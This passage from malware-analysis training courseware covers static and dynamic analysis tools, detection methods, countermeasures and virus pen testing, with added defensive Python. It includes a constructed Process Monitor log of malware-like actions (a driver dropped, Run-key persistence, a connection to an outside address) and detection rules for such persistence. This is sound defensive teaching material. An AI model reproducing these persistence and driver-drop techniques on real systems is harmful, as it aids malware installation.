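    "isolation.tools.hgfs.disable": "TRUE",   # shared folders (HGFS) off
    "isolation.tools.copy.disable": "TRUE",   # guest isolation: copy off
    "isolation.tools.paste.disable": "TRUE",  # guest isolation: paste off
    "isolation.tools.dnd.disable": "TRUE",    # guest isolation: drag and drop off
}

VMX_LINE = re.compile(r'^\s*([A-Za-z0-9_.:]+)\s*=\s*"?([^"]*)"?\s*$')


def parse_vmx(text):
    """Parse key = "value" lines into a dict; .vmx keys are case-insensitive."""
    settings = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = VMX_LINE.match(line)
        if m:
            settings[m.group(1).lower()] = m.group(2)
    return settings


def audit_vmx(text):
    """Return a list of findings; an empty list means the guest is isolated."""
    s = parse_vmx(text)
    findings = []
    # Every enabled virtual NIC must be host-only.  A NIC with no
    # connectionType is not known to be host-only, so it is flagged as well.
    nics = {k.split(".")[0] for k in s if k.startswith("ethernet")}
    for nic in sorted(nics):
        if s.get(f"{nic}.present", "TRUE").upper() != "TRUE":
            continue
        mode = s.get(f"{nic}.connectiontype", "<unset>").lower()
        if mode != "hostonly":
            findings.append(f"{nic}: connectionType is {mode}, expected hostonly")
    # Explicitly configured shared folders (sharedFolder0.present = "TRUE", ...)
    for k, v in s.items():
        if re.fullmatch(r"sharedfolder\d+\.present", k) and v.upper() == "TRUE":
            findings.append(f"{k}: a shared folder is still present")
    for key, want in REQUIRED.items():
        have = s.get(key, "<unset>")
        if have.upper() != want:
            findings.append(f"{key}: is {have}, expected {want}")
    return findings


def harden_vmx(text):
    """Return the .vmx text with the isolation settings applied in place or appended."""
    s = parse_vmx(text)
    fixed = dict(REQUIRED)
    for k in s:
        if re.fullmatch(r"ethernet\d+\.connectiontype", k):
            fixed[k] = "hostonly"
        if re.fullmatch(r"sharedfolder\d+\.present", k):
            fixed[k] = "FALSE"
    out, seen = [], set()
    for line in text.splitlines():
        m = VMX_LINE.match(line)
        key = m.group(1).lower() if m else None
        if key in fixed:
            out.append(f'{m.group(1)} = "{fixed[key]}"')   # keep the original key spelling
            seen.add(key)
        else:
            out.append(line)
    for key, val in fixed.items():
        if key not in seen:
            out.append(f'{key} = "{val}"')
    return "\n".join(out) + "\n"


# Constructed sample: a guest on NAT with a shared folder and clipboard enabled.
WEAK_VMX = """\
.encoding = "UTF-8"
config.version = "8"
displayName = "malware-sandbox"
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
sharedFolder0.present = "TRUE"
sharedFolder0.hostPath = "C:\\Samples"
isolation.tools.copy.disable = "FALSE"
"""

if __name__ == "__main__":
    for finding in audit_vmx(WEAK_VMX):
        print("FINDING:", finding)
    print(harden_vmx(WEAK_VMX))
```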


Malware Analysis Procedure
Step 1: Perform static analysis when the malware is inactive
Step 2: Collect information about:

- String values found in the binary with the help of string extracting tools such as BinText
- The packaging and compressing technique used with the help of compression and decompression tools such as UPX

BinText
Source: http://www.mcafee.com
BinText can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text, and resource strings, providing useful information for each item in the optional "advanced" view mode.


FIGURE 7.26: BinText screenshot (BinText 3.0.3 scanning C:\Users\Administrator\Desktop\setup.exe in advanced view; time taken 0.109 secs, text size 37340 bytes (36.46K); the Mem pos, File pos and Text columns list strings such as "!This program cannot be run in DOS mode", "IsProcessorFeaturePresent" and "KERNEL32"; status bar AN: 1840, UN: 373, RS: 0)

UPX
Source: http://upx.sourceforge.net

UPX achieves an excellent compression ratio and offers very fast decompression. It typically compresses better than WinZip/zip/gzip.
FIGURE 7.27: UPX working in Command Prompt (Administrator: C:\Windows\system32\cmd.exe running upx.exe from the UPX 3.08w directory with no arguments, which prints the usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..; commands -1 compress faster, -9 compress better, -d decompress, -l list compressed file, -t test compressed file, -V display version number, -h give more help, -L display software license; options -q be quiet, -v be verbose, -oFILE write output to 'FILE', -f force compression of suspicious files, -k keep backup files)
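As an added example that is not part of the course material, the Python below does in code what step 2 describes with BinText and UPX: it extracts ASCII and Unicode (UTF-16LE) strings from a binary and walks the PE section table to spot the UPX0/UPX1 section names and the "UPX!" marker a UPX-packed file carries. The two sample executables are constructed minimal PE images built by build_sample_pe, not real programs.

```python
import re
import struct


def ascii_strings(data, min_len=4):
    """Printable-ASCII runs of at least min_len bytes (BinText's 'A' strings)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def unicode_strings(data, min_len=4):
    """UTF-16LE runs of printable characters (BinText's 'U' strings)."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, data)]


def pe_section_names(data):
    """Follow e_lfanew to the PE header and return the section table's names."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]           # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]  # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size                              # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        raw = data[table + i * 40:table + i * 40 + 8]           # Name[8] of a 40-byte entry
        names.append(raw.rstrip(b"\x00").decode("ascii", "replace"))
    return names


def upx_indicators(data):
    """Heuristics that suggest UPX packing; an empty list means none were seen."""
    hits = []
    packed = [n for n in pe_section_names(data) if n.upper().startswith("UPX")]
    if packed:
        hits.append("section names " + ", ".join(packed))
    if b"UPX!" in data:
        hits.append("'UPX!' marker present")
    return hits


def triage(data):
    """Static summary of one sample: sections, packing hints, string counts."""
    return {
        "sections": pe_section_names(data),
        "upx": upx_indicators(data),
        "ascii_strings": len(ascii_strings(data)),
        "unicode_strings": len(unicode_strings(data)),
    }


def build_sample_pe(section_names, blobs):
    """Constructed minimal PE image (headers plus loose data, not a runnable program)."""
    stub = b"!This program cannot be run in DOS mode.\r\n$"
    e_lfanew = 0x40 + len(stub)
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew) + stub
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 224, 0x0102)
    optional = b"\x00" * 224
    sections = b"".join(n.encode().ljust(8, b"\x00") + b"\x00" * 32 for n in section_names)
    return dos + coff + optional + sections + b"\x00" * 4 + b"\x00\x00\x00\x00".join(blobs)


# Constructed samples: an unpacked layout and a UPX-style layout.
CLEAN_SAMPLE = build_sample_pe(
    [".text", ".data", ".rsrc"],
    [b"KERNEL32.dll", b"IsProcessorFeaturePresent", "General.AppName".encode("utf-16-le")],
)
PACKED_SAMPLE = build_sample_pe(
    ["UPX0", "UPX1", ".rsrc"],
    [b"UPX!", b"KERNEL32.dll", "General.AppName".encode("utf-16-le")],
)

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(label, triage(sample))
```

On a real packed file the string count is the telling number: almost everything readable is inside the compressed sections, so BinText shows little until the sample is unpacked with upx -d.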


Malware Analysis Procedure (Contd)
Step 3: Set up network connection and check that it is not giving any errors
Step 4: Run the virus and monitor the process actions and system information with the help of process monitoring tools such as Process Monitor and Process Explorer

Process Monitor
Source: http://technet.microsoft.com

Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, registry, and process/thread activity.


FIGURE 7.28: Process Monitor screenshot (Process Monitor - Sysinternals: www.sysinternals.com; columns Time of Day, Process Name, PID, Operation, Path, Result, Detail; rows show Explorer.EXE, mmc.exe and firefox.exe performing CreateFileMapping, CloseFile, CreateFile, ReadFile, TCP Receive and TCP Send operations, all with result SUCCESS; status bar: Showing 89,723 of 186,768 events (48%), Backed by virtual memory)


Malware Analysis Procedure (Contd)
Step 5: Record network traffic information using connectivity and log packet content monitoring tools such as NetResident and TCPView
Step 6: Determine the files added, processes spawned, and changes to the registry with the help of registry monitoring tools such as RegShot

NetResident
Source: http://www.tamos.com

NetResident is a network content analysis application designed to monitor, store, and reconstruct a wide range of network events and activities, such as email messages, web pages, downloaded files, instant messages, and VoIP conversations. It uses advanced monitoring technology to capture the data on the network, saves the data to a database, reconstructs it, and displays the content.
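As an added example that is not part of the course material, the Python below reads a Process Monitor CSV export (the same columns as the Process Monitor screenshot above) and pulls out what steps 4 to 6 ask for: files added, processes spawned, registry changes and outbound connections per process, flagging driver drops and persistence keys. The log lines are constructed to look like Procmon output, and the persistence-key and driver-directory rules are my choice of detection rules, not Procmon features.

```python
import csv
import io
import re

# Constructed Procmon "Save as CSV" export; paths and PIDs are invented.
SAMPLE_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"12:13:46.6201234 PM","Explorer.EXE","2384","CreateFileMapping","C:\\Windows\\System32\\imageres.dll","SUCCESS","SyncType: SyncTypeCreateSection, PageProtection: PAGE_READONLY"
"12:13:46.6212345 PM","sample.exe","4412","CreateFile","C:\\Windows\\System32\\drivers\\mrxcls.sys","SUCCESS","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert"
"12:13:46.6223456 PM","sample.exe","4412","WriteFile","C:\\Windows\\System32\\drivers\\mrxcls.sys","SUCCESS","Offset: 0, Length: 26,616"
"12:13:46.6300000 PM","sample.exe","4412","RegSetValue","HKLM\\System\\CurrentControlSet\\Services\\MRxCls\\ImagePath","SUCCESS","Type: REG_EXPAND_SZ, Length: 76, Data: %SystemRoot%\\System32\\drivers\\mrxcls.sys"
"12:13:46.6400000 PM","sample.exe","4412","RegSetValue","HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater","SUCCESS","Type: REG_SZ, Length: 52, Data: C:\\Users\\Admin\\AppData\\Local\\upd.exe"
"12:13:46.6500000 PM","sample.exe","4412","Process Create","C:\\Windows\\System32\\cmd.exe","SUCCESS","PID: 4520, Command line: cmd.exe /c ipconfig"
"12:13:46.6600000 PM","sample.exe","4412","TCP Connect","WIN-MSSELCK4K41:1056 -> 203.0.113.10:443","SUCCESS","Length: 0, mss: 1460, sackopt: 1, tsopt: 0, wsopt: 1, rcvwin: 65535"
"12:13:46.6700000 PM","mmc.exe","4100","ReadFile","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll","SUCCESS","Offset: 7,623,168, Length: 4,096"
"12:13:46.6800000 PM","sample.exe","4412","CreateFile","C:\\Users\\Admin\\AppData\\Local\\upd.exe","NAME NOT FOUND","Desired Access: Generic Read"
'''

# Detection rules (my choice): autostart and service locations, and the driver directory.
PERSISTENCE_KEYS = re.compile(
    r"\\CurrentVersion\\Run(Once)?\\|\\CurrentControlSet\\Services\\[^\\]+\\ImagePath$",
    re.IGNORECASE,
)
DRIVER_DIR = re.compile(r"\\System32\\drivers\\", re.IGNORECASE)
# A CreateFile adds a file when it asks for write access or a creating disposition.
FILE_ADD = re.compile(r"Generic Write|Write Data|Generic All|Disposition: (Create|OverwriteIf|Supersede)")


def parse_procmon_csv(text):
    """Rows of a Procmon CSV export as dicts keyed by the header names."""
    return list(csv.DictReader(io.StringIO(text)))


def triage_events(rows):
    """Group the successful events of interest by process, as step 6 asks."""
    report = {}
    for row in rows:
        if row["Result"] != "SUCCESS":
            continue  # failed operations are worth a look too, but not for this summary
        proc = f'{row["Process Name"]}:{row["PID"]}'
        entry = report.setdefault(proc, {"files_added": [], "processes_spawned": [],
                                         "registry_changes": [], "network": [], "alerts": []})
        op, path, detail = row["Operation"], row["Path"], row["Detail"]
        if op == "CreateFile" and FILE_ADD.search(detail):
            entry["files_added"].append(path)
            if DRIVER_DIR.search(path):
                entry["alerts"].append(f"driver dropped: {path}")
        elif op == "Process Create":
            entry["processes_spawned"].append(path)
        elif op in ("RegSetValue", "RegCreateKey", "RegDeleteValue", "RegDeleteKey"):
            entry["registry_changes"].append(path)
            if PERSISTENCE_KEYS.search(path):
                entry["alerts"].append(f"persistence key written: {path}")
        elif op in ("TCP Connect", "UDP Send"):
            entry["network"].append(path)
    return report


if __name__ == "__main__":
    for proc, entry in triage_events(parse_procmon_csv(SAMPLE_CSV)).items():
        if any(entry.values()):
            print(proc, entry)
```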


FIGURE 7.29: NetResident screenshot (NetResident - Evaluation Version, Events view listing Web protocol events dated 10/5/2012 between Party A WIN-LXQN3... and Party B hosts on ports 80 and 443, with Count, IP Address, Date and Last Updated columns; Event Detail shows a POST request to http://news.google.co.in/news/xhr/rhc?authuser=0 with a cid tag value; status bar 180 bytes, Connected, 1,067,459)


Malware Analysis Procedure (Cont'd)

Step 7: Collect the following information using debugging tools such as OllyDbg and ProcDump:
- Service requests
- Attempts for incoming and outgoing connections
- DNS tables information

OllyDbg
Source: http://www.ollydbg.de

OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.


[Screenshot: OllyDbg main window (CPU main thread, module OLLYDBG) showing the disassembly pane with calls into KERNEL32, the register pane (EAX to ESP, segment registers, flags) and the stack pane.]

FIGURE 7.30: OllyDbg Screenshot


Virus Analysis Tool: IDA Pro
Source: http://www.hex-rays.com

This is a disassembler and debugger tool that supports both Windows and Linux platforms.

Disassembler
The disassembler displays the instruction execution of various programs in symbolic form, even when the code is available only in binary form. It displays the instruction execution of the processor in the form of maps. It enables its users to identify viruses as well. For example, if any screensavers or "gif" files are trying to spy on any internal applications of the user, IDA Pro reveals this immediately. IDA Pro is developed with the latest techniques that enable it to trace difficult binary code, which it displays in readable execution maps.

Debugger
The debugger is an interactive tool that complements the disassembler to perform static analysis in a single step. It bypasses the obfuscation process, which helps the disassembler process the hostile code in depth.


IDA Pro is a tool that allows you to explore software interruptions and vulnerabilities and to use it for tamper resistance. It is an interactive, programmable, multi-processor disassembler coupled to a local and remote debugger and augmented by a complete plugin programming environment. It can also be used to protect your essential privacy rights. It is used by antivirus companies, research companies, software development companies, agencies, and military organizations.

[Screenshot: IDA Pro (IDA Demo 6.3) with qwingraph.exe loaded, showing the Functions window (sub_401070, sub_401200, ...), the IDA View-A disassembly of WinMain with calls to QString::fromWCharArray and QString::toLocal8Bit, and the Output window reporting that the input file is being analysed using the Microsoft VisualC FLIRT signature.]


Online Malware Testing: VirusTotal
Source: http://www.virustotal.com

[Screenshot: VirusTotal analysis page for a submitted file identified by its SHA256, listing per-engine results (AhnLab-V3, Antiy-AVL, Avast, AVG, ...) with detection names and signature update dates 20120716 and 20120717.]

VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, Trojans, and all kinds of malware detected by antivirus engines. Features:
- Free and independent service
- Uses multiple antivirus engines
- Comprised of real-time automatic updates of virus signatures
- Gives detailed results from each antivirus engine
- Has real-time global statistics
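What an analyst takes away from a multi-engine service is the hash that identifies the sample and the per-engine verdicts reduced to a detection ratio. The block below is an added example, not VirusTotal's code or API: the report dict, its layout (engine name mapped to a detected flag, a detection name and a signature-update date), the engine names and the detection names are all constructed for this demo, and the triage threshold in `verdict` is an assumption to be replaced by your own policy.

```python
"""Reduce a multi-engine scan report to an actionable summary.

Added example, not VirusTotal's code or API. The report below is a
constructed dict; its layout and the engine and detection names are
assumptions for this demo. It shows how the sample is identified by its
SHA-256 and how independent verdicts become a detection ratio, with
engines running old signatures called out separately.
"""
import hashlib

# Constructed sample; a real submission would be the suspicious file itself.
SAMPLE_BYTES = b"MZ" + b"\x00" * 62 + b"constructed test binary, not malware"

# Constructed report. "update" is the engine's signature date as YYYYMMDD.
SCAN_REPORT = {
    "EngineA": {"detected": True,  "result": "Backdoor.Win32.Example.gen", "update": "20120716"},
    "EngineB": {"detected": True,  "result": "Win32:Example-gen",          "update": "20120717"},
    "EngineC": {"detected": False, "result": None,                         "update": "20120716"},
    "EngineD": {"detected": True,  "result": "Trojan.Example",             "update": "20120601"},
    "EngineE": {"detected": False, "result": None,                         "update": "20120716"},
}


def sha256_hex(data: bytes) -> str:
    """SHA-256 of the sample: the key under which scan services index results."""
    return hashlib.sha256(data).hexdigest()


def summarise_report(report: dict, stale_before: str) -> dict:
    """Count detections and separate out engines with old signature databases.

    A miss from an engine whose signatures predate `stale_before` says little
    about the sample, so those engines are listed rather than counted as clean.
    """
    flagged = {name: info["result"] for name, info in sorted(report.items()) if info["detected"]}
    stale = sorted(name for name, info in report.items() if info["update"] < stale_before)
    return {
        "positives": len(flagged),
        "total": len(report),
        "ratio": f"{len(flagged)}/{len(report)}",
        "flagged": flagged,
        "stale_engines": stale,
    }


def verdict(summary: dict, min_positives: int = 2) -> str:
    """Triage rule (assumed threshold): several independent engines agreeing is a
    stronger signal than a single engine's generic detection name."""
    if summary["positives"] >= min_positives:
        return "likely malicious"
    if summary["positives"] == 1:
        return "suspicious: single detection, verify manually"
    return "no detections (not proof of cleanliness)"


if __name__ == "__main__":
    print("sample sha256:", sha256_hex(SAMPLE_BYTES))
    s = summarise_report(SCAN_REPORT, stale_before="20120701")
    print(f"detection ratio {s['ratio']}; stale engines: {s['stale_engines']}")
    for engine, name in s["flagged"].items():
        print(f"  {engine}: {name}")
    print("verdict:", verdict(s))
```

Submitting a sample shares it with the service and, through it, with the vendors; for confidential files, look the hash up first and submit only when the hash is unknown.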


[Screenshot: VirusTotal result page for the same file, showing per-engine detection names (Backdoor.Win32.MoSucker variants).]

FIGURE 7.32: virustotal Screenshot


Online Malware Analysis Services

Online malware analysis services allow you to scan files and resources and secure them before attackers compromise them. A few online malware analysis services are listed as follows:
- Anubis: Analyzing Unknown Binaries available at http://anubis.iseclab.org
- Avast! Online Scanner available at http://onlinescan.avast.com
- Malware Protection Center available at https://www.microsoft.com
- ThreatExpert available at http://www.threatexpert.com
- Dr. Web Online Scanners available at http://vms.drweb.com
- Metascan Online available at http://www.metascan-online.com
- Bitdefender QuickScan available at http://www.bitdefender.com
- GFI SandBox available at http://www.gfi.com
- UploadMalware.com available at http://www.uploadmalware.com
- Fortinet available at http://www.fortiguard.com


Module Flow

So far, we have discussed various viruses and worms and malware analysis. Now we will discuss the countermeasures to be applied to protect against viruses and worms, if any are found. These countermeasures help in enhancing security.

Virus and Worms Concept
Types of Viruses
Computer Worms
Malware Analysis
Countermeasures
Penetration Testing

This section highlights various virus and worm countermeasures.


Virus Detection Methods

A virus scanner is an important piece of software that one should have installed on the PC. If there is no scanner, there is a high chance that the system can be hit by and suffer from a virus. A virus protector should be run regularly on the PC, and the scan engine and virus signature database have to be updated often. Antivirus software is of no use if it does not know what to look for in the latest virus. One should always remember that an antivirus program cannot stop everything. The rule of thumb is that if an email looks suspicious, e.g., if one is not expecting an email from the sender, does not know the sender, or the header looks like something that a known sender would not normally say, one must be careful about opening the email, as there might be a risk of becoming infected by a virus. The MyDoom and W32.Novarg.A@mm worms infected many Internet users recently. These worms infected most users through email.

The three best methods for antivirus detection are:
- Scanning: once a virus has been detected, it is possible to write scanning programs that look for signature strings characteristic of the virus
- Integrity checking: integrity checking products work by reading the entire disk and recording integrity data that acts as a signature for the files and system sectors
- Interception: the interceptor monitors the operating system requests that are written to the disk

In addition, a combination of some of these techniques can be more effective.


Scanning
- The moment a virus is detected in the wild, antivirus vendors across the globe start writing scanning programs that look for its signature strings (characteristic of the virus). The strings are identified and extracted from the virus by these scanner writers. The resulting new scanners search memory, files, and system sectors for the signature strings of the new virus. The scanner declares the presence of a virus once it finds a match. Only known and pre-defined viruses can be detected.
- Virus writers often create many new viruses by altering an existing one. What looks like a new virus may have taken just a few minutes to create. Attackers make these changes frequently to throw off the scanners. In addition to signature recognition, new scanners make use of various other detection techniques such as code analysis. Before looking into the code characteristics of a virus, the scanner examines the code at various locations in an executable file. In another approach, the scanner sets up a virtual computer in RAM and tests the programs by executing them in the virtual space. This technique, called "heuristic scanning," can also check and remove messages that might contain a computer virus or other unwanted content.
- The major advantages of scanners are:
  - They can check programs before they are executed.
  - It is the easiest way to check new software for any known or malicious virus.
- The major drawbacks to scanners are:
  - Old scanners can prove to be unreliable. With the tremendous increase in new viruses, old scanners can quickly become obsolete. It is best to use the latest scanners available on the market.
  - Even a new scanner is never equipped to handle all new challenges, since viruses appear more rapidly than new scanners can be developed to battle them.
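The mechanism described above, a scanner that declares a match when a known signature string is found, is small enough to show in full. The following is an added example, not any vendor's engine: the signature database and the "files" are constructed byte strings held in memory (a real scanner applies the same matching to files, memory and boot sectors), and the signature names, the `..` wildcard-byte notation and the fixed-offset rule are this example's own conventions. It also makes the passage's limitation concrete: a sample that no longer contains a recorded string is simply not matched.

```python
"""Signature-string scanner of the kind described under Scanning.

Added example, not a vendor's scanner. Signatures are hex byte patterns;
".." stands for any one byte, the usual way to tolerate small variations
in otherwise identical code. A signature may be anchored at a fixed offset
(cheap, typical for header or entry-point checks) or searched anywhere.
"""
import re

# Constructed signature database: name -> (hex pattern, fixed offset or None).
SIGNATURES = {
    "Demo.Sample.A": ("48 45 4c 4c 4f", None),    # "HELLO" anywhere in the data
    "Demo.Sample.B": ("4d 5a .. .. 50 45", 0),    # "MZ" ?? ?? "PE" at offset 0
}


def compile_signature(hex_pattern: str):
    """Turn "de ad .. ef" into a compiled bytes regex with wildcard bytes."""
    parts = hex_pattern.split()
    regex = b"".join(b"." if p == ".." else re.escape(bytes.fromhex(p)) for p in parts)
    return re.compile(regex, re.DOTALL)


COMPILED = {name: (compile_signature(p), off) for name, (p, off) in SIGNATURES.items()}


def scan_bytes(data: bytes) -> list:
    """Return the sorted names of every signature that matches `data`."""
    hits = []
    for name, (pattern, offset) in COMPILED.items():
        if offset is None:
            if pattern.search(data):
                hits.append(name)
        elif pattern.match(data, offset):
            hits.append(name)
    return sorted(hits)


# Constructed "files" to scan; none of them is real malware.
FILES = {
    "clean.txt": b"just an ordinary text file",
    "infected.bin": b"MZ\x01\x02PE\x00\x00 ... HELLO world",
    "shifted.bin": b"XXMZ\x01\x02PE",   # "MZ" not at offset 0: Sample.B must not fire
}


def scan_files(files: dict) -> dict:
    """Scan every file and map its name to the list of matched signatures."""
    return {name: scan_bytes(data) for name, data in files.items()}


if __name__ == "__main__":
    for fname, hits in scan_files(FILES).items():
        print(f"{fname}: {hits or 'clean'}")
```

The offset-anchored check is what keeps a large signature database fast; the anywhere-in-file search is what catches an infected host program where the viral code sits at an arbitrary position.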

Integrity Checking
- Integrity checking products perform their functions by reading and recording integrity data to develop a signature or baseline for those files and system sectors.
- Integrity products check any program with built-in intelligence. This is really the only solution that can take care of all the threats to data. The most trusted way to know the amount of damage done by a virus is provided by these integrity checkers, since they can check data against the originally established baseline.


- A disadvantage of a basic integrity checker is that it cannot differentiate file corruption caused by a bug from corruption caused by a virus.
- However, there are some advanced integrity checkers available that are capable of analyzing and identifying the types of changes that viruses make. A few integrity checkers combine some of the antivirus techniques with integrity checking to create a hybrid. This also simplifies the virus checking process.

Interception
- The main use of an interceptor is for deflecting logic bombs and Trojans. The interceptor controls requests to the operating system for network access or actions that cause a threat to the program. If it finds such a request, the interceptor generally pops up and asks if the user wants to allow the request to continue.
- There are no dependable ways to intercept direct branches to low-level code or direct input and output instructions issued by the virus. In some cases, the virus is capable of disabling the monitoring program itself. Some years back, only eight bytes of code were needed to turn off the monitoring functions of a widely used antivirus program.


Virus and Worms Countermeasures

Preventive measures need to be followed in order to lessen the possibility of virus infections and data loss. If certain rules and actions are adhered to, the possibility of falling victim to a virus can be minimized. Some of these methods include:
- Install antivirus software that detects and removes infections as they appear
- Generate an antivirus policy for safe computing and distribute it to the staff
- Pay attention to the instructions while downloading files or any programs from the Internet
- Update the antivirus software on a monthly basis, so that it can identify and clean out new bugs
- Avoid opening attachments received from an unknown sender, as viruses spread via email attachments
- Possibility of virus infection may corrupt data; thus, regularly maintain data backups
- Schedule regular scans for all drives after the installation of antivirus software
- Do not accept disks or programs without checking them first using a current version of an antivirus program


Virus and Worms Countermeasures (Cont'd)

- Ensure the executable code sent to the organization is approved
- Run disk cleanup, registry scanner, and defragmentation once a week
- Do not boot the machine with an infected bootable system disk
- Turn on the firewall if the OS used is Windows XP
- Keep informed about the latest virus threats
- Run anti-spyware or adware scans once a week
- Check DVDs and CDs for virus infection
- Block files with more than one file type extension
- Ensure the pop-up blocker is turned on and use an Internet firewall
- Be cautious with files being sent through the instant messenger
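The countermeasure "block files with more than one file type extension" is easy to state and easy to get wrong at a mail gateway, because the dangerous case is a decoy document extension followed by an executable one, padded with spaces to push the real extension out of view. The block below is an added example, not part of the module: the extension lists are short assumptions for the demo (a deployment uses its own policy lists), the filenames are constructed, and the classification labels and function names are this example's own.

```python
"""Flag attachment names with more than one file-type extension.

Added example, not from the module. The executable and decoy extension
lists are assumptions kept short for the demo.
"""

# Extensions Windows runs or scripts on double-click (assumed policy list).
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "wsf", "hta", "msi"}
# Harmless-looking extensions commonly used as the inner decoy (assumed list).
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "png", "txt", "zip"}


def extensions_of(filename: str) -> list:
    """Return the extension chain of a name, lower-cased, innermost first.

    'Invoice.PDF.exe' -> ['pdf', 'exe']; 'archive.tar.gz' -> ['tar', 'gz'].
    Whitespace inside each part is stripped because runs of spaces before the
    final extension are a common way to hide it in a narrow mail client column.
    """
    parts = filename.strip().split(".")
    return [p.strip().lower() for p in parts[1:] if p.strip()]


def classify_attachment(filename: str) -> str:
    """Return 'block', 'review' or 'allow' for an attachment name.

    block  : a decoy extension followed by an executable one (report.pdf.exe)
    review : more than one extension of any other kind (backup.tar.gz)
    allow  : zero or one extension (single executables are left to other
             controls; this check is only about multiple extensions)
    """
    exts = extensions_of(filename)
    if len(exts) < 2:
        return "allow"
    if exts[-1] in EXECUTABLE_EXTS and any(e in DECOY_EXTS for e in exts[:-1]):
        return "block"
    return "review"


def classify_all(names: list) -> dict:
    """Classify every name in a list of attachment filenames."""
    return {name: classify_attachment(name) for name in names}


# Constructed attachment names as a mail filter would see them.
SAMPLE_NAMES = [
    "quarterly_report.pdf",
    "quarterly_report.pdf.exe",
    "photo.jpg                 .scr",
    "REPORT.DOC.EXE",
    "backup.tar.gz",
    "setup.exe",
]

if __name__ == "__main__":
    for name, decision in classify_all(SAMPLE_NAMES).items():
        print(f"{decision:6s}  {name!r}")
```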


Companion Antivirus: Immunet
Source: http://www.immunet.com

Companion Antivirus means that Immunet is compatible with existing antivirus solutions. Immunet adds an extra, lightweight layer of protection for greater peace of mind. Since traditional antivirus solutions detect on average only 50% of online threats, most users are underprotected, which is why every PC can benefit from Immunet's essential layer of security. Immunet Protect's detection power relies on ETHOS and SPERO, the heuristics-based engine and the cloud engine. Users of the Plus version also benefit from a third engine called TETRA, which provides protection when not connected to the Internet.


[Screenshot: Immunet 3.0 console showing the Community counter (2,478,268 people protected), the Scan Complete summary (files scanned, threats detected, threats removed, elapsed time) and the Immunet Plus upgrade panel.]

FIGURE 7.33: Immunet Screenshot


Antivirus Tools

Antivirus tools prevent, detect, and remove viruses and other malicious code from your system. These tools protect your system and repair viruses in all incoming and outgoing email messages and instant messenger attachments. In addition, these tools monitor the network's traffic for malicious activities. A few antivirus tools that can be used for the purpose of detecting and killing the viruses in the systems are listed as follows:
- AVG Antivirus available at http://free.avg.com
- BitDefender available at http://www.bitdefender.com
- Kaspersky Anti-Virus available at http://www.kaspersky.com
- Trend Micro Internet Security Pro available at http://apac.trendmicro.com
- Norton AntiVirus available at http://www.symantec.com
- F-Secure Anti-Virus available at http://www.f-secure.com
- Avast Pro Antivirus available at http://www.avast.com
- McAfee AntiVirus Plus 2013 available at http://home.mcafee.com
- ESET Smart Security 5 available at http://www.eset.com
- Total Defense Internet Security Suite available at http://www.totaldefense.com


Module Flow

Penetration testing must be conducted against viruses and worms, as they are the most widely used means of attack. They do not require extensive knowledge to use. Hence, you should conduct pen testing on your system or network before a real attacker exploits it.

Virus and Worms Concept
Types of Viruses
Computer Worms
Malware Analysis
Countermeasures
Penetration Testing

This section provides insight into virus and worm pen testing.


Penetration Testing for Viruses

Since you are an expert Ethical Hacker and Penetration Tester, the IT director instructs you to test the network for any viruses and worms that could damage or steal the organization's information. You need to construct viruses and worms and try to inject them in a dummy network (virtual machine) and check whether they are detected by antivirus programs or able to bypass the network firewall. As a pen tester, you should carry out the following steps to conduct a virus penetration test:

Step 1: Install an antivirus program
You should install an antivirus program on the network infrastructure and on the end-user's system before conducting the penetration test.

Step 2: Update the antivirus software
Check whether your antivirus is updated or not. If not, update your antivirus software so that its virus database covers newly identified viruses.

Step 3: Scan the system for viruses
You should scan your target system; this will help you to repair damage or delete files infected with viruses.


Penetration Testing for Viruses (Cont'd)

Step 4: Set the antivirus to quarantine or delete the virus
Set your antivirus software to compare file contents with the known computer virus signatures, identify infected files, quarantine and repair them if possible, or delete them if not.

Step 5: Go to safe mode and delete the infected file manually
If the virus is not removed, then go to safe mode and delete the infected file manually. Once the virus is removed, the system is safe.


Penetration Testing for Virus (Cont'd)

Scan the system for running processes, registry entries, startup programs, files and folders integrity and services. Use tools such as What's Running and Winsonar.
If any suspicious process, registry entry, startup program or service is discovered, check the associated executable files. Use tools such as jv16 PowerTools 2012 and Reg Organizer.
Collect more information about these from the publishers' websites, if available, and the Internet.
Scan for Windows services: Use tools such as SrvMan and ServiWin.
Scan for startup programs: Check the startup programs and determine if all the programs in the list can be recognized with known functionalities. Use tools such as Starter, Security AutoRun, and Autoruns.
